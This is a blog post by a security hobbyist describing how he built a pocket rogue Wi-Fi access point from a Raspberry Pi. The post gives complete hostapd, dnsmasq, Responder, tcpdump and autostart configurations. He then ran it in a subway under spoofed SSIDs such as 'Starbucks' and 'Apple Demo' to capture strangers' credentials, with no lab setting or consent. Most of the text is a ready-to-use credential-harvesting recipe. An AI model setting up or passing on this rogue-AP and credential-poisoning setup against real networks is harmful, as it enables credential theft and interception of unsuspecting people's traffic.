jeudi 16 février 2017

All your credz are belong to me. When raspi meets wifi sniffing.

1/ A wild Raspberry appears!

Two weeks ago, I won in a CTF a raspberry Pi3. After toying a little with the ARM CPU, I decided to make something offensive with this raspi. As you may know, the raspberry 3 comes with an integrated Wifi card, and it's powered with an USB cable:
We don't clearly see the wifi card, but it's here :-)

On the other hand, I have a neat little rescue battery for my phone:
A battery full of energy

This battery delivers 800mA, and its enough to power the raspberry for more than two hours (maybe more, but I never tried for more than two hours and it's largely enough for me). With this setup, I have a portable raspberry and I can walk anywhere.

The idea is to configure the raspberry as an access point, and wait for innocents smartphones to connect with it. Listen the network, then grab as much data as possible. Free credz for me \o/  This kind of tests have been made in the past, but I just want to test it by myself.
It ended to be incredibly easy to setup and successfull.

2/ Setup everything

We need three parts: create an access point, set up some honeypots to gather credz, and sniff data. Once OK, launch everything at boot.

2/1/ Access Point

Before creating the access point, we have to configure the wifi card, and setup a DHCP server.
Add those lines in /etc/network/interfaces:
 allow-hotplug wlan0   
 iface wlan0 inet static   
   address 172.24.1.1  
   netmask 255.255.255.0  
   network 172.24.1.0  
   broadcast 172.24.1.255  

Next, install dnsmasq, and create a specific conf file, only for answering DHCP requests:
 root@raspberrypi:~# mv /etc/dnsmasq.conf /etc/dnsmasq.conf.ori  
 root@raspberrypi:~# cat /etc/dnsmasq.d/dnsmasq.conf   
 # Listen on this specific port instead of the standard DNS port  
 # (53). Setting this to zero completely disables DNS function,  
 # leaving only DHCP and/or TFTP.  
 port=0  
 interface=wlan0   # Use interface wlan0   
 listen-address=172.24.1.1 # Explicitly specify the address to listen on   
 bind-interfaces   # Bind to the interface to make sure we aren't sending things elsewhere   
 domain-needed    # Don't forward short names   
 bogus-priv      # Never forward addresses in the non-routed address spaces.   
 dhcp-range=172.24.1.50,172.24.1.150,12h # Assign IP addresses between 172.24.1.50 and 172.24.1.150 with a 12 hour lease time   
 # DNS is managed by another process, which will send rogue response  
 dhcp-option=6,172.24.1.1  
 root@raspberrypi:~#   

And installing the AP is very straightforward:
 root@raspberrypi:~# apt-get install hostapd  
 create a file /etc/hostap/hostapd.conf  
 root@raspberrypi:~# cat /etc/hostapd/hostapd.conf  
 interface=wlan0  
 driver=nl80211  
 #Configure the name of the SSID to fulfill your needs  
 ssid=My Test SSID  
 hw_mode=g  
 channel=6  
 ieee80211n=1  
 wmm_enabled=1  
 ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]  
 macaddr_acl=0  
 #Warning, this is the configuration for a full Open AP. Anybody can use it.  
 #Don't use it without knowing what you do
 auth_algs=1  
 root@raspberrypi:~#  

Launch it with
 root@raspberrypi:~# hostapd -d /etc/hostapd/hostapd.conf  

You shoud see the SSID "My Test SSID" in any Wifi Device, and connection should work. You won't get internet access, but we don't need it.

2/2/ Honeypoting

I decided to reuse Responder, which is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. It's designed for windows (netbios, and so on) in mind but it works with any smartphone/tablet because of all authentications server.

Once again, really easy:
 root@raspberrypi:~# git clone https://github.com/SpiderLabs/Responder.git  
no configuration file is needed, anything works out of the box. Nice.

2/3/ Sniffing

We will sniff with tcpdump.
 root@raspberrypi:~# apt-get install tcpdump  

2/4/ Launch everything at boot

As I will used this raspberry in my pocket, it must be able to launch everything at boot without ant interaction, then regain access while plugged in a computer with SSH access. For that, I'm using screen and a systemd unit file:
 root@raspberrypi:~# cat /etc/systemd/system/screen_AP.service   
 [Unit]  
 Description=screen for AP  
 [Service]  
 Type=oneshot  
 RemainAfterExit=yes  
 ExecStart=/usr/bin/screen -c /root/screen_AP  
 StandardInput=tty  
 TTYPath=/dev/tty2  
 TTYReset=yes  
 TTYVHangup=yes  
 [Install]  
 WantedBy=multi-user.target  
 root@raspberrypi:~#  

And the screen_AP file launch three tabs, then detach:
 root@raspberrypi:~# cat screen_AP   
 startup_message off  
 defscrollback 100000  
 screen -d -m -t AP hostapd -d /etc/hostapd/hostapd.conf  
 chdir /root/Responder  
 screen -d -m -t Responder ./Responder.py -I wlan0 -bwrf  
 screen -d -m -t tcpdump tcpdump -s0 -n -i wlan0 -w /root/AP.pcap  
 detach  
 root@raspberrypi:~#  
That's it, you're done!

The Pi will boot, setup the wlan0 card, launching it as an AP (dnsmasq start with its own unit file), launch Responder and sniff everything.

3/ Playground

My tests have shown that association is not so easy to achieve
  • A smartphone won't connect to any open wifi magically
  • A smartphone take some long seconds to associate: You can't just walk in the street waiting for phone to connect.
Those two problems can be solved. First, I reuse some well-known SSID names such as "Starbucks", "Apple DEMO", "orange" or "FreeWifi" (I'm in france and those two last names are french ISP providing open wifi) and so on.

Second, for the delay made by the connecting time, I choose the subway. People are standing still for some minutes, and eventually they can be tempted to connect to an open Wifi network. Moreover, subway here doesn't have any cell networks, so phone would be more tempted to join wifi networks I guess.

Let's try
The subway will make a stop to Sniffing Station!

4/ Results

It works. Not really well, but it works, I had connections. For example, with the SSID "Apple Demo" (the ssid available in any apple store) I have associations and connections to captive.apple.com and so on..

For the credz, nothing will be published here, and I can't deny nor confirm anything about them ^_^


The main problem I'm facing is the SSID name. Very unfortunately, the wifi card in the Pi3 can only manage one SSID:
 root@raspberrypi:~# iw list  
 Wiphy phy0  
  (...)  
      valid interface combinations:  
            * #{ managed } <= 1, #{ P2P-device } <= 1, #{ P2P-client, P2P-GO } <= 1,  
             total <= 3, #channels <= 2  
            * #{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,  
             total <= 4, #channels <= 1  
      Device supports scan flush.  
 root@raspberrypi:~#  
total AP <= 1 , such a bad luck :-(

I can make rolling SSID names, but having 8 SSID at the same time would have been so nice :)

Next step could be:
  • Enhance the AP part with:
    • buying an external USB wifi card :-/
    • roll SSIDs names every 3-4 minutes, but that's unsatisfying
  • Enhance the Responder part with more honeypots and better HTTP response
    • Usually, apps and OS do a GET to a known domainname and wait for a specific string

Good side effects is that I can use the SSID to connect to the raspberry with my phone, thanks to ConnectBot and see logs in real time :-)

5/ Conclusion

That was fun to setup and to see the logs.
Note to myself: be sure than Wifi on my smartphone is turned off :-)

0xMitsurugi
"Cry in the dojo. Laugh on the battlefield."
~ Author unknown

Aucun commentaire:

Publier un commentaire